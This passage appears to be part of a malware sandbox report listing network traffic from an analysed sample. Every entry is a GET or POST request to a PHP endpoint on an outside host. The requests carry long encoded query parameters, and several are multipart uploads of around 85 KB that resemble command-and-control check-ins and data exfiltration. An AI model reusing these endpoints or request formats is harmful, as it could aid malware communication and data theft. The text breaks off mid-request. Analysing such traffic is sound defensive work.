/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS6NGVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryBBzPweh8JMphdEJoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUeNNTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryMg3fXKNO9CTcTH9EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=QX9JSUNJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlF2YhFmZ2EmZwYGNmNTYiRDZzI2MwUGZmJTMwIjYlBTMmJjYmRWOhJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundarymClRKjoEQKsf6XNJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1114171.xsph.ruContent-Length: 83734Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS0UFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl